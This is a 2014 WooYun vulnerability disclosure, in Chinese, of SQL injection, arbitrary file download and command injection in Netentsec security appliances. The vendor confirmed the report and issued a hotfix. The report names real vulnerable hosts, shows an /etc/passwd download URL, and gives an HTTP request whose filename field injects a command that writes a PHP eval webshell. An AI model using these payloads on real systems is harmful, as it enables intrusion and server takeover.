乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-04: 细节已通知厂商并且等待厂商处理中 2014-05-05: 厂商已经确认,细节仅向厂商公开 2014-06-29: 细节向核心白帽子及相关领域专家公开 2014-07-09: 细节向普通白帽子公开 2014-07-19: 细节向实习白帽子公开 2014-08-02: 厂商已经修复漏洞并主动公开,细节向公众公开
五一放假无聊,把网康能找到的产品都测试了下,黑盒进去了,利用漏洞看到了代码,还好,至少其他产品的代码比那个应用防火墙好多了,不过还是存在不少问题。网康多个设备所有版本通用漏洞:网康智能流量管理系统网康科技·日志分析中心网康集中管理平台网康互联网控制网关网康下一代防火墙包括但不限于以上产品(因为部分产品未找到实例测试)
html/applications/user/controllers/LoginController.php
function resetpassAction() { $this->view->translate = $this->translate; $this->view->translate_main = $this->translate_main; Zend_Loader::loadClass('Common_Conf_Config'); $Common_Conf_Config=new Common_Conf_Config('db_conf'); $sub = $this->getRequest()->getParam('sub'); if (isset($sub)) { $registry = Zend_Registry::getInstance(); $db_conf = $registry->get('db_conf'); $username= $this->getRequest()->getParam('username'); $useremail = $this->getRequest()->getParam('useremail'); if (!$username) { echo "<script>alert('".$this->translate_main->_('RESET_PASS_ERROR1')."'); </script>\n"; echo "<script>document.location.href='resetpass';</script>\n"; exit; } if (!$useremail) { echo "<script>alert('".$this->translate_main->_('RESET_PASS_ERROR2')."'); </script>\n"; echo "<script>document.location.href='resetpass';</script>\n"; exit; } if( !eregi("^[a-z0-9]+([_\\.-][a-z0-9]+)*". "@([a-z0-9]+([\.-][a-z0-9]+))*$",$useremail)) { echo "<script>alert('".$this->translate_main->_('RESET_PASS_ERROR3')."');</script>"; echo "<script>document.location.href='resetpass';</script>\n"; exit; } if(($username<>'reset_password_default')and($useremail<>'[email protected]')) { $sql = "SELECT * FROM gui_users WHERE username='$username'"; $my = $db_conf->fetchAll($sql); if(count($my)==0) { echo "<script>alert('".$this->translate_main->_('RESET_PASS_ERROR4')."');</script>"; echo "<script>document.location.href='resetpass';</script>\n"; exit; } elseif (count($my)!= 0 && $my[0]['email'] != $useremail) { echo "<script>alert('".$this->translate_main->_('RESET_PASS_ERROR5')."');</script>\n"; echo "<script>document.location.href='resetpass';</script>\n"; exit; } $smtp_server=$Common_Conf_Config->readConfig('smtp_server',''); if($smtp_server=='') { echo "<script>alert('".$this->translate_main->_('RESET_PASS_ERROR6')."');</script>"; echo "<script>document.location.href='resetpass';</script>\n"; exit; } $smtp_server_port=$Common_Conf_Config->readConfig('smtp_server_port',25); $smtp_auth_type=$Common_Conf_Config->readConfig('smtp_auth_type','off'); $smtp_user=$Common_Conf_Config->readConfig('smtp_user',''); $smtp_user_password=$Common_Conf_Config->readConfig('smtp_user_password',''); if($smtp_auth_type=='on') { if($smtp_user=='') { echo "<script>alert('".$this->translate_main->_('RESET_PASS_ERROR7')."');</script>"; echo "<script>document.location.href='resetpass';</script>\n"; exit; } if($smtp_user_password=='') { echo "<script>alert('".$this->translate_main->_('RESET_PASS_ERROR8')."');</script>"; echo "<script>document.location.href='resetpass';</script>\n"; exit; } $auth=1; } else { $auth=0; } $smtp_mail_from=$Common_Conf_Config->readConfig('smtp_mail_from',$smtp_user); $status=mt_rand (10000,32767); $hash=md5($my[0]['id'].$status.$username); if((isset($_SERVER["HTTPS"]))and($_SERVER["HTTPS"]=='on')) { $http_head="https"; }else { $http_head='http'; } $http_url=$http_head."://".$_SERVER["SERVER_NAME"]."/user/login/resetpass1?id=".$my[0]['id']."&confirm_hash=".$hash; $body=$this->translate_main->_('RESET_PASS_EMAIL_BODY1')."\r\n\r\n".$this->translate_main->_('RESET_PASS_EMAIL_BODY5')."\r\n\r\n".$http_url."\r\n\r\n".$this->translate_main->_('RESET_PASS_EMAIL_BODY2').$username."\r\n\r\n".$this->translate_main->_('RESET_PASS_EMAIL_BODY3').$_SERVER["REMOTE_ADDR"]."\r\n\r\n".$this->translate_main->_('RESET_PASS_EMAIL_BODY4'); $from = $smtp_mail_from; $to = $useremail; $subject = $this->translate_main->_('RESET_PASS_EMAIL_TITLE'); putenv('subject='.$subject); putenv('mail_to='.$to); if($fp=@fopen("/var/www/html/tmp/tmpmail","w")) { fputs($fp,$body); fclose($fp); putenv('content=/var/www/html/tmp/tmpmail'); } $msg=shell_exec('/var/www/html/scripts/sendmail'); @unlink("/var/www/html/tmp/tmpmail"); if ($msg==0) { $sql="update gui_users set status=".$status." where username='".($username)."'"; $db_conf->query($sql); try { Zend_Loader::loadClass('User_Log_Eventlog'); $Eventlog = new User_Log_Eventlog('db_log'); $Eventlog->LogAdd($username,'get_pass_mail','reset_pass',$_REQUEST,1); } catch (Exception $e) { } echo "<script>alert('".$this->translate_main->_('RESET_PASS_NOTICE1').$useremail.$this->translate_main->_('RESET_PASS_NOTICE2')."');</script>"; echo "<script>document.location.href='/';</script>\n"; exit(); } else { echo "<script>alert('".$this->translate_main->_('RESET_PASS_NOTICE3')."');</script>"; echo "<script>document.location.href='resetpass';</script>\n"; exit(); } }else { exit; } } else { $this->view->addScriptPath( BASE_PATH . '/user/views/scripts/login'); $this->render("resetpass"); } }
username没有过滤造成sql注入以下产品通杀,但不限于以下系统
网康智能流量管理系统:https://117.117.107.118/user/login/resetpass网康科技·日志分析中心:http://202.192.18.125/login/resetpass网康集中管理平台https://60.30.254.218/user/login/resetpass网康互联网控制网关https://hbzjw.net.cn/user/login/resetpass网康下一代防火墙https://js-lianfa.com/user/login/resetpass
可注入进后台然后getshell后台任意文件下载:https://qujiangyizhong.com/system/backup/down?path=/etc/passwdgetshell:问题出在备份那里,可执行任意命令
POST /system/backup/backup HTTP/1.1Host: qujiangyizhong.comConnection: keep-aliveContent-Length: 24Origin: https://qujiangyizhong.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept: */*DNT: 1Referer: https://qujiangyizhong.com/system/backup/indexAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie:data:filename=backup_20140501;echo "<?php eval(\$_POST[cmd]);?>" > /var/www/html/tmp/test.php;
最新版(3.0)的:
其他系统:
危害等级:高
漏洞Rank:15
确认时间:2014-05-05 23:31
非常感谢帮助我们发现了问题。涉及到的漏洞我们已经在通过hotfix修复,在线设备默认情况下可自行完成升级,少数低版本或用户手动关闭自动更新功能的设备需进行手动升级,我们的服务部门将尽快通过多种形式通知用户。
2014-07-14:hotfix已经修复